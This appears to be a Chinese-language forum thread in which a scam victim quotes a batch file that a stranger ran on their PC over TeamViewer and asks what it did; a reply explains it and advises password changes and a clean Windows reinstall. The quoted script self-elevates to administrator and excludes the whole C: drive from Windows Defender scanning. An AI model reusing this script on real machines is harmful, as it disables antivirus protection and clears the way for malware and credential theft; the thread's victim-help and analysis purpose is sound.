嗨,我在我的 Facebook 页面上遇到了一些困难,我在一个随机的 FB 小组上发布了关于一个人告诉我他可以提供帮助的问题。
我们在 TeamViewer 上直播,他偷偷安装了一个程序并运行了一个包含以下代码的 notepad.bat 文件。
@echo off
if not "%1"=="am_admin" (powershell start -verb runas '%0' am_admin & exit /b)
start cmd /c "powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:""
start notepad.exe
我删除了.bat文件,删除了他偷偷下载的软件,删除了我电脑启动时的应用程序。
现在谁能知道上面的代码做了什么以及我现在应该采取什么预防措施?
我正在寻找一个潜在的解决方案,我犯了一个错误,并希望有人在这方面帮助我。
我建议你更改 Facebook 和其他任何东西的所有密码 和干净的格式安装 Windows,安装 Malwarebytes 和 Kaspersky 并在移动重要文件进行备份之前和安装干净的 Windows 之前进行扫描。强烈推荐干净的 Windows 安装。
很明显,他安装了恶意软件来窃取密码和重要信息。
.bat 的作用:
这是Windows批处理脚本,添加排除路径到Windows Defender,然后打开记事本。
这是脚本的工作原理:
@echo off"%1"=="am_admin"powershell start -verb runas '%0' am_admin & exit /bAdd-MpPreference -ExclusionPath "C:"start notepad.exe